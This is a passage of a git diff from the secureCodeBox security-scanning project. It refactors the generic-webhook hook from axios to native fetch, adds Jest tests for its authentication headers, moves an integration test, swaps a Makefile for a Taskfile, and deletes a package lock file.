"^29.3.1" } } diff --git a/tests/integration/hooks/finding-post-processing.test.js b/hooks/finding-post-processing/integration-tests/finding-post-processing.test.js similarity index 65% rename from tests/integration/hooks/finding-post-processing.test.js rename to hooks/finding-post-processing/integration-tests/finding-post-processing.test.js index 8cebdd885b..2889c3dc94 100644 --- a/tests/integration/hooks/finding-post-processing.test.js +++ b/hooks/finding-post-processing/integration-tests/finding-post-processing.test.js @@ -2,22 +2,20 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../helpers"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers"; test( - "Finding Post Processing after test-scan", + "finding-post-processing after test-scan", async () => { const { severities, count } = await scan( "finding-post-processing", "test-scan", - [], - 90 + ["placeholder"], + 90, ); expect(count).toBe(2); expect(severities.high).toBe(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/hooks/generic-webhook/Makefile b/hooks/generic-webhook/Makefile deleted file mode 100644 index 1743782cc8..0000000000 --- a/hooks/generic-webhook/Makefile +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = generic-webhook - -include ../../hooks.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-http-webhook deploy-test-dep-test-scan - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install ro-hook . \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="webhookUrl=http://http-webhook/hallo-welt" \ No newline at end of file diff --git a/hooks/generic-webhook/Taskfile.yaml b/hooks/generic-webhook/Taskfile.yaml new file mode 100644 index 0000000000..506312ea12 --- /dev/null +++ b/hooks/generic-webhook/Taskfile.yaml @@ -0,0 +1,12 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: generic-webhook diff --git a/hooks/generic-webhook/hook/Dockerfile b/hooks/generic-webhook/hook/Dockerfile index 2f59d82b14..79b2354999 100644 --- a/hooks/generic-webhook/hook/Dockerfile +++ b/hooks/generic-webhook/hook/Dockerfile @@ -4,13 +4,6 @@ ARG namespace ARG baseImageTag -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --production - FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ -COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --chown=root:root --chmod=755 ./hook.js ./hook.js diff --git a/hooks/generic-webhook/hook/hook.js b/hooks/generic-webhook/hook/hook.js index f441308de5..c4914d2d31 100644 --- a/hooks/generic-webhook/hook/hook.js +++ b/hooks/generic-webhook/hook/hook.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function handle({ +export async function handle({ getFindings, scan, webhookUrl = process.env["WEBHOOK_URL"], @@ -10,18 +10,30 @@ async function handle({ webhookPassword = process.env["WEBHOOK_PASSWORD"], webhookApikeyHeaderName = process.env["WEBHOOK_APIKEY_HEADER_NAME"], webhookApikeyHeaderValue = process.env["WEBHOOK_APIKEY_HEADER_VALUE"], - axios = require('axios') }) { const findings = await getFindings(); console.log(`Sending ${findings.length} findings to ${webhookUrl}`); - if (webhookApikeyHeaderName && webhookApikeyHeaderValue){ - await axios.post(webhookUrl, {scan, findings }, {headers: { [webhookApikeyHeaderName]: webhookApikeyHeaderValue}}); - } else if (webhookUser && webhookPassword){ - await axios.post(webhookUrl, {scan, findings }, {auth: {username: webhookUser, password: webhookPassword}}); - } else { - await axios.post(webhookUrl, {scan, findings }); + const body = JSON.stringify({ scan, findings }); + const headers = { + 'Content-Type': 'application/json', + }; + + if (webhookApikeyHeaderName && webhookApikeyHeaderValue) { + headers[webhookApikeyHeaderName] = webhookApikeyHeaderValue; + } else if (webhookUser && webhookPassword) { + const credentials = Buffer.from(`${webhookUser}:${webhookPassword}`).toString('base64'); + headers['Authorization'] = `Basic ${credentials}`; + } + + const response = await fetch(webhookUrl, { + method: 'POST', + headers, + body, + }); + + if (!response.ok) { + throw new Error(`Webhook request failed with status ${response.status}: ${await response.text()}`); } } -module.exports.handle = handle; diff --git a/hooks/generic-webhook/hook/hook.test.js b/hooks/generic-webhook/hook/hook.test.js index 5f6f6f140e..eeaafc4e19 100644 --- a/hooks/generic-webhook/hook/hook.test.js +++ b/hooks/generic-webhook/hook/hook.test.js @@ -2,8 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); -const axios = jest.createMockFromModule('axios') +import { handle } from "./hook"; + +// Mock global fetch +global.fetch = jest.fn(() => + Promise.resolve({ + ok: true, + status: 200, + text: () => Promise.resolve(''), + }) +); beforeEach(() => { jest.clearAllMocks(); @@ -30,10 +38,97 @@ test("should send a post request to the url when fired", async () => { const webhookUrl = "http://example.com/foo/bar"; - await handle({ getFindings, scan, webhookUrl, axios }); + await handle({ getFindings, scan, webhookUrl }); + + expect(fetch).toHaveBeenCalledWith(webhookUrl, { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + }, + body: JSON.stringify({ + scan, + findings: [], + }), + }); +}); + +test("should include API key header when provided", async () => { + const findings = []; + const getFindings = async () => findings; + const scan = { metadata: { name: "test-scan" } }; + const webhookUrl = "http://example.com/webhook"; + const webhookApikeyHeaderName = "X-API-Key"; + const webhookApikeyHeaderValue = "secret-api-key"; - expect(axios.post).toBeCalledWith(webhookUrl, { + await handle({ + getFindings, scan, - findings: [], + webhookUrl, + webhookApikeyHeaderName, + webhookApikeyHeaderValue + }); + + expect(fetch).toHaveBeenCalledWith(webhookUrl, { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + 'X-API-Key': 'secret-api-key', + }, + body: JSON.stringify({ + scan, + findings: [], + }), }); }); + +test("should include basic auth when username and password are provided", async () => { + const findings = []; + const getFindings = async () => findings; + const scan = { metadata: { name: "test-scan" } }; + const webhookUrl = "http://example.com/webhook"; + const webhookUser = "username"; + const webhookPassword = "password"; + + // Base64 encoding of "username:password" + const expectedAuthHeader = "Basic dXNlcm5hbWU6cGFzc3dvcmQ="; + + await handle({ + getFindings, + scan, + webhookUrl, + webhookUser, + webhookPassword + }); + + expect(fetch).toHaveBeenCalledWith(webhookUrl, { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + 'Authorization': expectedAuthHeader, + }, + body: JSON.stringify({ + scan, + findings: [], + }), + }); +}); + +test("should throw an error when the response is not ok", async () => { + // Override the default mock to return a failed response + global.fetch.mockImplementationOnce(() => + Promise.resolve({ + ok: false, + status: 500, + text: () => Promise.resolve('Internal Server Error'), + }) + ); + + const findings = []; + const getFindings = async () => findings; + const scan = { metadata: { name: "test-scan" } }; + const webhookUrl = "http://example.com/webhook"; + + await expect(handle({ getFindings, scan, webhookUrl })) + .rejects + .toThrow('Webhook request failed with status 500: Internal Server Error'); +}); diff --git a/hooks/generic-webhook/hook/package-lock.json b/hooks/generic-webhook/hook/package-lock.json deleted file mode 100644 index a0df1b103a..0000000000 --- a/hooks/generic-webhook/hook/package-lock.json +++ /dev/null @@ -1,6366 +0,0 @@ -{ - "name": "@securecodebox/hook-generic-webhook", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hook-generic-webhook", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "axios": "^1.6.0" - }, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": 